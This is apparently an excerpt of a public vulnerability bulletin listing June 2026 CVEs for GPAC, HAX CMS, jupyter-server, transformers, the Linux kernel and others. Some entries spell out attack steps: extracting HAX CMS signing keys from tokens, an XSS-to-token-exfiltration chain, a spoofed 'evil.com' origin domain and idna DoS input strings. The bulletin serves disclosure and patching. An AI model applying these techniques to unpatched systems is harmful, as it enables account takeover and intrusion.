| Google--Chrome | Insufficient policy enforcement in History in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11309 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506392934 |
| GPAC--MP4Box | A heap buffer overflow in the m2tsdmx_send_packet function (filters/dmx_m2ts.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-01 | not yet calculated | CVE-2025-55664 | https://github.com/gpac/gpac/issues/3310 https://github.com/gpac/gpac/commit/9bd6a72c9efc0513dfd33b87498afc7658dabd26 https://infosec.exchange/@sigdevel/116659245751279377 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_odf_ac4_cfg_dsi_v1 function (/odf/descriptors.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AC4 file. | 2026-06-01 | not yet calculated | CVE-2025-60481 | https://github.com/gpac/gpac/commit/e02d1fd24cdc26acb1b236ab38b3832cffcae21b https://github.com/gpac/gpac/issues/3296 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/45/README.md https://infosec.exchange/@sigdevel/116659159345966316 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_ac4_pres_b_4_back_channels_present function (/media_tools/av_parsers.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AC4 file. | 2026-06-01 | not yet calculated | CVE-2025-60483 | https://github.com/gpac/gpac/commit/13eb5b76560aaf7813b865a2ad433258478e2695 https://github.com/gpac/gpac/issues/3302 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/49/README.md https://infosec.exchange/@sigdevel/116659111520602254 |
| GPAC--MP4Box | A segmentation violation in the gf_isom_apple_set_tag_ex function (/isomedia/isom_write.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-01 | not yet calculated | CVE-2025-60485 | https://github.com/gpac/gpac/issues/3323 https://github.com/gpac/gpac/commit/4860a1a6f128ccc9ae37b4b738d22029f9672457 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/52/README.md https://infosec.exchange/@sigdevel/116662498332150083 |
| GPAC--MP4Box | A heap use-after-free in the dasher_process function (/filters/dasher.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MPEG-2 file. | 2026-06-01 | not yet calculated | CVE-2025-60486 | https://github.com/gpac/gpac/commit/e6d01820d7bf3967d931fedb379ee5f209bc133b https://github.com/gpac/gpac/issues/3314 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/53/README.md https://infosec.exchange/@sigdevel/116662544397024289 |
| GPAC--MP4Box | A segmentation violation in the gf_media_get_color_info function (/media_tools/isom_tools.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted data file. | 2026-06-01 | not yet calculated | CVE-2025-60495 | https://github.com/gpac/gpac/issues/3335 https://github.com/gpac/gpac/commit/9beed3c0a2f38505c745e5376234e7ed66e8e0b1 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/66/README.md https://infosec.exchange/@sigdevel/116659058320692913 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_filter_pid_resolve_file_template_ex function (/filter_core/filter_pid.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted file. | 2026-06-03 | not yet calculated | CVE-2025-60477 | https://github.com/gpac/gpac/issues/3301 https://github.com/gpac/gpac/commit/13eb5b76560aaf7813b865a2ad433258478e2695 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/48/README.md https://infosec.exchange/@sigdevel/116658486442433074 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth ONT models due to improper handling of user-supplied input in multiple diagnostic functions in its web management interface. An authenticated remote attacker could exploit this vulnerability by injecting and executing arbitrary OS commands on the targeted device. Successful exploitation of this vulnerability could allow the attacker to perform remote code execution with root privileges on the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45431 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth ONT models due to the transmission of user credentials in plaintext over HTTP in its web management interface. A remote attacker could exploit this vulnerability by intercepting network traffic to obtain sensitive authentication information, which could lead to unauthorized access to the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45432 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth 2022 ONT models due to the presence of a hardcoded RSA private key within the device firmware. A remote attacker could exploit this vulnerability by extracting the cryptographic private key from the firmware, which could lead to decryption of HTTPS traffic and Man-in-the-Middle (MITM) attacks on the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45433 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| haxtheweb--@haxtheweb/open-apis | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 9.0.1 and prior to version 26.0.0 of @haxtheweb/open-apis, multiple functions conduct substring-only matching to validate hostnames to which basic authorization should be sent. An attacker can append the matched substrings to an attacker-controlled endpoint and capture authentication. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46391 | https://github.com/haxtheweb/issues/security/advisories/GHSA-4fg7-f244-3j49 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. An authenticated Server-Side Request Forgery (SSRF) vulnerability in versions prior to 26.0.0 allows authenticated users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access. Version 26.0.0 contains a fix. | 2026-06-05 | not yet calculated | CVE-2026-46393 | https://github.com/haxtheweb/issues/security/advisories/GHSA-q862-gcgq-5m6g |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, the `hmacBase64()` function in the HAXcms Node.js backend contains two critical cryptographic implementation errors that together allow any unauthenticated attacker to extract the system's private signing key and forge arbitrary admin-level JSON Web Tokens (JWTs), allowing them to get full admin access with a single HTTP request. First, the function passes the literal string "0" as the HMAC signing key instead of the key parameter, making every HAXcms instance compute identical HMACs for the same input. Then, after computing the HMAC, the function concatenates the real key parameter, "this.privateKey + this.salt" (the system's master signing secret), directly onto the output. The combined buffer is base64-encoded and returned as the token. Every base64url token produced has the same structure: 32 bytes of HMAC keyed with "0" followed by N bytes of `privateKey+salt`. An attacker base64-decodes any token, discards the first 32 bytes, and reads the private key directly. The `/system/api/connectionSettings` endpoint is unauthenticated and returns multiple tokens generated by this function. A single GET request to this endpoint exposes the private key. The PHP backend implements this function correctly with the actual key and returns only the hash. The PHP version produces 44-character tokens whereas the broken Node.js version produces 139+ character tokens. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46395 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6c8g-9hfh-pq5h |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of `<iframe>` elements. The application allows `javascript:` URIs in the `src` attribute, which are executed when a malicious page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim's browser and access sensitive data exposed to client-side scripts. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46396 | https://github.com/haxtheweb/issues/security/advisories/GHSA-jh3h-rpxg-fr36 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. The PHP version of HAX CMS prior to version 26.0.0 has an authenticated file overwrite vulnerability. An attacker can exploit this vulnerability to configure malicious Git filter commands and achieve code execution on the HAX CMS server. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46399 | https://github.com/haxtheweb/issues/security/advisories/GHSA-q759-vxg8-vq5j |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of the `<video-player>` component. The component allows `javascript:` URIs in the `source` attribute, which are executed when the page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim's browser and access sensitive data such as JWT tokens and more. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46496 | https://github.com/haxtheweb/issues/security/advisories/GHSA-2m6p-hm3w-6jm3 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an attack chain utilizing Stored XSS alongside dynamic token exposure in the `/system/api/connectionSettings` endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the `jwt`, `user_token`, `site_token`, and `appstore_token`) into a global JavaScript variable (`window.appSettings`). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46511 | https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 2.0.0 and prior to version 26.0.0, the gitlist plugin is exposed to unauthenticated users, allowing unauthenticated browsing of git repositories and git history. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46390 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6434-8rch-w65c |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an OS command injection vulnerability exists in the Git.php library of the HAXcms PHP backend. The application constructs shell command strings using unsanitized input and executes them via proc_open(). An attacker who can control parameters passed into Git operations can execute arbitrary OS commands with the privileges of the web server. Out of 17 functions that invoke shell commands only 1 function (`commit()`) correctly uses `escapeshellarg()`. When combined with another vulnerability that allows configuration manipulation, this issue can lead to full remote code execution and complete system compromise. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46394 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6jf3-9fgh-cmfr |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 25.0.0 and prior to version 26.0.0, the haxcms_refresh_token cookie is set without the Secure flag. This allows it to be transmitted over unencrypted HTTP, making it vulnerable to theft via packet sniffing on the network. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46398 | https://github.com/haxtheweb/issues/security/advisories/GHSA-g7v2-r32q-jf5v |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 11.0.6 and prior to version 25.0.0, the file upload functionality in HAXCMS PHP only validates file extensions using a regex pattern without checking the actual file content or MIME type. This allows attackers to upload malicious files (e.g., PHP webshells) disguised as legitimate image files, potentially leading to remote code execution. Version 25.0.0 contains a fix for the issue. | 2026-06-05 | not yet calculated | CVE-2026-46400 | https://github.com/haxtheweb/issues/security/advisories/GHSA-ffxv-9qv2-v2v8 |
| haxtheweb--issues | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions prior to 26.0.0 suffer from an improper session termination vulnerability where authentication tokens remain valid after user logout. This allows attackers who obtain valid tokens to maintain persistent access to authenticated CMS functionality, bypassing the intended session termination mechanism and enabling unauthorized access to CMS metadata and administrative functions. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46401 | https://github.com/haxtheweb/issues/security/advisories/GHSA-g5rc-4gpf-wx3w |
| HCLSoftware--Digital Experience | HCL Digital Experience is affected by an OS command injection vulnerability in the Digital Asset Management API. An attacker may execute arbitrary operating system commands, typically inheriting the privileges of the vulnerable application, which could possibly lead to a complete system takeover and data compromise. | 2026-06-05 | not yet calculated | CVE-2026-21837 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130849 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a server-side request forgery vulnerability in the Microsoft Teams channel handler that allows remote attackers to exfiltrate Bot Framework bearer tokens by supplying a forged activity with an attacker-controlled serviceUrl value. Attackers can poison the stored conversation reference by sending a crafted inbound activity to the Teams webhook, causing subsequent bot replies to transmit token-bearing Authorization header requests to an attacker-controlled host. | 2026-06-01 | not yet calculated | CVE-2026-49139 | https://github.com/HKUDS/nanobot/releases/tag/v0.2.1 https://github.com/HKUDS/nanobot/pull/4047 https://github.com/HKUDS/nanobot/commit/232df45126bcf0f8fccd123d73714f202c8e8612 https://www.vulncheck.com/advisories/nanobot-ssrf-via-microsoft-teams-channel-serviceurl-poisoning |
| HMBRAND--DBI | DBI versions before 1.648 for Perl have a heap overflow when preparsing SQL statements with more than 9 binders. The preparse method expands SQL placeholder characters to numbered binders of the form :pN, but only allocates three characters per binder in the buffer. Placeholders 10-99 require four characters, 100-999 require five characters, et cetera. | 2026-06-05 | not yet calculated | CVE-2026-10879 | https://metacpan.org/release/HMBRAND/DBI-1.648/changes https://github.com/perl5-dbi/dbi/commit/af79036c07aa9a457971c0f4136e37c85dc20978.patch |
| HP Inc.--poly_trio_8300 | In certain scenarios when the admin has enabled Interactive Connectivity Establishment (ICE), a buffer overflow could enable remote code execution on Poly Voice products on the Linux platform. | 2026-06-01 | not yet calculated | CVE-2026-0826 | https://support.hp.com/us-en/document/ish_15052661-15052687-16/hpsbpy04083 |
| huggingface--huggingface/transformers | A vulnerability in the LightGlue model loading path of huggingface/transformers version 5.2.0 allows an attacker-controlled model repository to execute arbitrary code during model initialization. The issue arises because the `trust_remote_code` parameter, intended to prevent remote code execution, is overridden by untrusted serialized configuration data in a nested code path. Specifically, when loading a LightGlue model using `AutoModel.from_pretrained()` with `trust_remote_code=False`, the `LightGlueConfig` reads the `trust_remote_code` value from the untrusted `config.json` file and propagates it into nested `AutoConfig.from_pretrained()` calls. This results in the execution of attacker-provided Python modules, even when the victim explicitly disables remote code execution. The vulnerability poses a high risk for environments such as API inference servers, research notebooks, CI/CD pipelines, and model evaluation workers, potentially leading to credential theft, lateral movement, or persistence/backdoor deployment. | 2026-06-03 | not yet calculated | CVE-2026-5241 | https://huntr.com/bounties/ceb3ce1a-4c45-497a-b25e-cb9a7685e619 https://github.com/huggingface/transformers/commit/676559d5022b74aaa0cee1cee0842b7f27c5320e |
| Imagination Technologies--Graphics DDK | Kernel software installed and running inside a Guest/Host VM may post improper commands to the GPU Firmware to trigger a write of data outside the intended GPU memory. A logic error in the address translation allowed a compromised Host (Kernel) to perform arbitrary writes to firmware memory. | 2026-06-01 | not yet calculated | CVE-2026-34193 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| joomlacontenteditor.net--Joomla Content Editor (JCE) extension for Joomla | A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution. | 2026-06-05 | not yet calculated | CVE-2026-48907 | https://www.joomlacontenteditor.net/ |
| jupyter--jupyter/jupyter | A path traversal vulnerability exists in jupyter-server version 2.17.0 due to an incorrect root directory boundary check in the _get_os_path() function within jupyter_server/services/contents/fileio.py. The check uses startswith(root) without appending a trailing path separator, allowing sibling directories with names starting with the same prefix as root_dir to bypass the check. Additionally, the to_os_path() function in utils.py does not strip ".." from path parts, enabling traversal sequences to bypass the vulnerable check. This vulnerability can lead to unauthorized read/write access to files in sibling directories, potentially exposing sensitive data in shared hosting environments. | 2026-06-02 | not yet calculated | CVE-2026-5422 | https://huntr.com/bounties/24a36953-6490-466f-8cb2-a90d1ca56e0f |
| jupyter--jupyter/jupyter | A vulnerability in jupyter-server versions 1.12.0 through 2.17.0 allows an attacker to bypass CORS origin validation when the `allow_origin_pat` configuration is used. The issue arises from the use of `re.match()` for validating the `Origin` header, which only anchors at the start of the string. This allows attacker-controlled domains such as `trusted.example.com.evil.com` to pass validation against patterns intended to match `trusted.example.com`. The vulnerability affects multiple locations in the codebase, including CORS headers, WebSocket connections, referer validation, and login redirects, potentially enabling phishing attacks, arbitrary code execution, and unauthorized access to sensitive API responses. | 2026-06-03 | not yet calculated | CVE-2026-6657 | https://huntr.com/bounties/18f642db-3569-43b3-b58d-ff97be4b09d7 |
| KAMSOFT--KS-SOMED | Use of hard-coded credentials in KS-SOMED allowed an unauthorized attacker access to the FTP server that hosted the application's update packages. An attacker with these credentials could upload a malicious update file, which then may have been distributed and installed on client machines as a legitimate update. This issue affects KS-SOMED with modules: KSPLUPDFTP.exe up to 30.00.00.056 and ANEKSKLIENT.EXE up to 29.00.02.026. Besides removing the hard-coded credentials from the code and changing the update process, access granted by the previously exposed credentials was limited to read-only. | 2026-06-01 | not yet calculated | CVE-2026-42251 | https://cert.pl/posts/2026/06/CVE-2026-1958 https://kamsoft.pl/ks-somed/ |
| Kimi--AI v.1.0 | A Cross Site Scripting vulnerability exists in the Kimi AI v1.0 web interface's 'Preview' feature. The application fails to properly sanitize or encode HTML/JavaScript payloads generated by the AI model. When a user switches to the 'Preview' tab to view AI-generated code, the malicious payload is rendered directly into the DOM, leading to arbitrary JavaScript execution in the victim's browser session. | 2026-06-03 | not yet calculated | CVE-2026-39107 | https://github.com/MGTx2 https://github.com/MGTx2/CVE-2026-39107 |
| kjd--idna | Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `"\u0660" * N` or `"\u30fb" * N + "\u6f22"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. | 2026-06-05 | not yet calculated | CVE-2026-45409 | https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx |
| Koha--Koha | A Cross Site Scripting vulnerability in Koha 25.11 and before allows a remote attacker to execute arbitrary code via the file upload function in the Invoice features. | 2026-06-03 | not yet calculated | CVE-2026-26378 | https://github.com/Koha-Community/Koha https://g03m0n.github.io https://g03m0n.github.io/posts/cve-2026-26378/ |
| Koha--Koha | Koha versions up to 25.11 contain a Server-Side Request Forgery (SSRF) vulnerability via the Z39.50/SRU server configuration. This allows authenticated attackers to perform internal network scanning and identify running services by analyzing server response times. | 2026-06-03 | not yet calculated | CVE-2026-26379 | https://github.com/Koha-Community/Koha https://g03m0n.github.io/ https://g03m0n.github.io/posts/cve-2026-26379/ |
| Laravel-Backpack--CRUD | backpack/crud provides Create, Read, Update & Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Versions prior to 5.0.13, 4.1.69, and 4.0.63 are vulnerable to cross-site scripting. An attacker could conduct a targeted phishing campaign, in order to trick users or admins into clicking a malicious link, which under very specific circumstances could give them information or possibly admin access. Versions 5.0.13, 4.1.69, and 4.0.63 patch the issue. As a workaround, manually look inside error views in `resources/views/errors` and output `e($exception->getMessage())` instead of `$exception->getMessage()`. | 2026-06-03 | not yet calculated | CVE-2022-31114 | https://github.com/Laravel-Backpack/CRUD/security/advisories/GHSA-m8xx-3x29-84h8 |
| libxls--libxls | libxls through version 1.6.3 contains a use of uninitialized memory vulnerability in the OLE container parser. Memory allocated for the Master Sector Allocation Table (MSAT) in read_MSAT() is not fully initialized before being consumed by ole2_validate_sector_chain(), which may result in application crashes or potential information disclosure when processing a crafted XLS file. | 2026-06-03 | not yet calculated | CVE-2026-26824 | https://github.com/libxls/libxls/issues/155 |
| libxls--libxls | A use-of-uninitialized memory vulnerability exists in libxls 1.6.3 when parsing malformed XLS files. The issue is reachable via xls_parseWorkBook() and is triggered by uninitialized heap memory originating from the OLE layer (ole2_read). The flaw is detectable with MemorySanitizer (MSAN) and can lead to undefined behavior, incorrect parsing logic, or potential information disclosure. | 2026-06-03 | not yet calculated | CVE-2026-26825 | https://github.com/libxls/libxls/issues/156 |
| linqi GmbH--linqi | An Improper Authentication vulnerability in the /api/Cdn/GetFile endpoint of linqi allows unauthenticated, remote attackers to bypass file access controls. The ValidateAnonFileAccess function incorrectly grants access if an 'AnonFile' query parameter containing exactly 256 characters is provided. While this flaw allows bypassing the intended authorization check, the actual security impact is negligible; the exposed resources are strictly limited to minified JavaScript and CSS files that contain no sensitive data and are already publicly accessible via a standard CDN. | 2026-06-05 | not yet calculated | CVE-2026-11345 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-improper-authentication-bypass-in-cdn-file-access-in-linqi |
| linqi GmbH--linqi | A Server-Side Request Forgery (SSRF) vulnerability in the custom process creation feature of linqi allows an authenticated attacker to probe internal network components. By crafting a specific process containing an HTTP Request component, an attacker can force the server to send arbitrary HTTP requests. By observing the varying application responses (Success, Failed, or 504 Gateway Time-out), the attacker can determine the status of internal ports, leading to internal network reconnaissance. | 2026-06-05 | not yet calculated | CVE-2026-11346 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-server-side-request-forgery-ssrf-allowing-internal-network-probing |
| linqi GmbH--linqi | The linqi application contains hardcoded cryptographic keys. Additionally, the application uses a weak algorithm with a limited ASCII charset to dynamically generate Initialization Vectors (IVs) for AES/CBC encryption, making known-plaintext attacks feasible. An attacker with local access can leverage these vulnerabilities to decrypt sensitive obfuscated strings, including ConnectionString values containing database credentials from appsettings.json. | 2026-06-05 | not yet calculated | CVE-2026-11347 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-hardcoded-cryptographic-keys-and-weak-iv-generation-in-linqi |
| linqi GmbH--linqi | The Comment API (GET /api/Comment and POST /api/Comment) in the affected application fails to perform authorization checks to verify that the requesting user has access to the object identified by the relatedObjectId. This Insecure Direct Object Reference (IDOR) vulnerability allows any authenticated user to read and write comments on any process across all business units by supplying an arbitrary object GUID. | 2026-06-05 | not yet calculated | CVE-2026-11369 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-insecure-direct-object-reference-idor-in-comment-api-in-linqi |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Add missing NULL check for alloc_workqueue() alloc_workqueue() can return NULL on memory allocation failure. Without proper error checking, this may lead to a NULL pointer dereference when queue_work() is later called with the NULL workqueue pointer in epf_ntb_epc_init(). Add a NULL check immediately after alloc_workqueue() and return -ENOMEM on failure to prevent the driver from loading with an invalid workqueue pointer. | 2026-06-03 | not yet calculated | CVE-2025-71313 | https://git.kernel.org/stable/c/314eab6740bcda504ef978be599f805de05ce6de https://git.kernel.org/stable/c/03f336a869b3a3f119d3ae52ac9723739c7fb7b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Recover from panthor_gpu_flush_caches() failures We have seen a few cases where the whole memory subsystem is blocked and flush operations never complete. When that happens, we want to: - schedule a reset, so we can recover from this situation - in the reset path, we need to reset the pending_reqs so we can send new commands after the reset - if more panthor_gpu_flush_caches() operations are queued after the timeout, we skip them and return -EIO directly to avoid needless waits (the memory block won't miraculously work again) Note that we drop the WARN_ON()s because these hangs can be triggered with buggy GPU jobs created by the UMD, and there's no way we can prevent it. We do keep the error messages though. v2: - New patch v3: - Collect R-b - Explicitly mention the fact we dropped the WARN_ON()s in the commit message v4: - No changes | 2026-06-03 | not yet calculated | CVE-2025-71314 | https://git.kernel.org/stable/c/8ec4f1b14a6147db07d6e51aa1d6bcc799649847 https://git.kernel.org/stable/c/57753f2c64c033a21a7400b3a2192db1cd6c890e https://git.kernel.org/stable/c/2c899c6026fc9d39286735b30c4d8550d4ea075b https://git.kernel.org/stable/c/3c0a60195b37af83bbbaf223cd3a78945bace49e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix dc_link NULL handling in HPD init amdgpu_dm_hpd_init() may see connectors without a valid dc_link. The code already checks dc_link for the polling decision, but later unconditionally dereferences it when setting up HPD interrupts. Assign dc_link early and skip connectors where it is NULL. Fixes the below: drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_irq.c:940 amdgpu_dm_hpd_init() error: we previously assumed 'dc_link' could be null (see line 931) drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_irq.c 923 /* 924 * Analog connectors may be hot-plugged unlike other connector 925 * types that don't support HPD. Only poll analog connectors. 926 */ 927 use_polling |= 928 amdgpu_dm_connector->dc_link && ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The patch adds this NULL check but hopefully it can be removed 929 dc_connector_supports_analog(amdgpu_dm_connector->dc_link->link_id.id); 930 931 dc_link = amdgpu_dm_connector->dc_link; dc_link assigned here. 932 933 /* 934 * Get a base driver irq reference for hpd ints for the lifetime 935 * of dm. Note that only hpd interrupt types are registered with 936 * base driver; hpd_rx types aren't. IOW, amdgpu_irq_get/put on 937 * hpd_rx isn't available. DM currently controls hpd_rx 938 * explicitly with dc_interrupt_set() 939 */ --> 940 if (dc_link->irq_source_hpd != DC_IRQ_SOURCE_INVALID) { ^^^^^^^^^^^^^^^^^^^^^^^ If it's NULL then we are trouble because we dereference it here. 941 irq_type = dc_link->irq_source_hpd - DC_IRQ_SOURCE_HPD1; 942 /* 943 * TODO: There's a mismatch between mode_info.num_hpd 944 * and what bios reports as the # of connectors with hpd | 2026-06-03 | not yet calculated | CVE-2026-46245 | https://git.kernel.org/stable/c/a490e4d3c9fed1e690c8de348416eea3a9f054ff https://git.kernel.org/stable/c/226a40c06a183abaeb7529a4f54d6c203bd14407 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_lbc: Fix use-after-free for extcon in IRQ handler Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `extcon` handle, means that the `extcon` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `extcon` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `extcon_set_state_sync()` with a freed `extcon` handle. Which usually crashes the system or otherwise silently corrupts the memory... Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `extcon` handle. | 2026-06-03 | not yet calculated | CVE-2026-46246 | https://git.kernel.org/stable/c/9fab0120907e6965168e55b1e17cb9dfaf262b86 https://git.kernel.org/stable/c/47abfc207ab02cf1297257e282e8048da63f0d08 https://git.kernel.org/stable/c/48e0f68b50c344bb2d78d65dd98f93e41276ee00 https://git.kernel.org/stable/c/23067259919663580c6f81801847cfc7bd54fd1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: qcom: gfx3d: add parent to parent request map After commit d228ece36345 ("clk: divider: remove round_rate() in favor of determine_rate()") determining GFX3D clock rate crashes, because the passed parent map doesn't provide the expected best_parent_hw clock (with the round_rate path before the offending commit the best_parent_hw was ignored). Set the field in parent_req in addition to setting it in the req, fixing the crash. clk_hw_round_rate (drivers/clk/clk.c:1764) (P) clk_divider_bestdiv (drivers/clk/clk-divider.c:336) divider_determine_rate (drivers/clk/clk-divider.c:358) clk_alpha_pll_postdiv_determine_rate (drivers/clk/qcom/clk-alpha-pll.c:1275) clk_core_determine_round_nolock (drivers/clk/clk.c:1606) clk_core_round_rate_nolock (drivers/clk/clk.c:1701) __clk_determine_rate (drivers/clk/clk.c:1741) clk_gfx3d_determine_rate (drivers/clk/qcom/clk-rcg2.c:1268) clk_core_determine_round_nolock (drivers/clk/clk.c:1606) clk_core_round_rate_nolock (drivers/clk/clk.c:1701) clk_core_round_rate_nolock (drivers/clk/clk.c:1710) clk_round_rate (drivers/clk/clk.c:1804) dev_pm_opp_set_rate (drivers/opp/core.c:1440 (discriminator 1)) msm_devfreq_target (drivers/gpu/drm/msm/msm_gpu_devfreq.c:51) devfreq_set_target (drivers/devfreq/devfreq.c:360) devfreq_update_target (drivers/devfreq/devfreq.c:426) devfreq_monitor (drivers/devfreq/devfreq.c:458) process_one_work (arch/arm64/include/asm/jump_label.h:36 include/trace/events/workqueue.h:110 kernel/workqueue.c:3284) worker_thread (kernel/workqueue.c:3356 (discriminator 2) kernel/workqueue.c:3443 (discriminator 2)) kthread (kernel/kthread.c:467) ret_from_fork (arch/arm64/kernel/entry.S:861) | 2026-06-03 | not yet calculated | CVE-2026-46247 | https://git.kernel.org/stable/c/82cfe5292b11deb1dc33822f67f73cfbe8eafe25 https://git.kernel.org/stable/c/547ae2f17349c7586953af5ef50de43ef3f65e9e https://git.kernel.org/stable/c/56360aa4ddd736fc19e6d0b0206c5e437e0d6ff8 https://git.kernel.org/stable/c/aed53da569fb96eec09b4817b1953bcc2e467eea https://git.kernel.org/stable/c/8aa972eba1f29068d13bec716d33abca30fb3f2a https://git.kernel.org/stable/c/2583cb925ca1ce450aa5d74a05a67448db970193 |
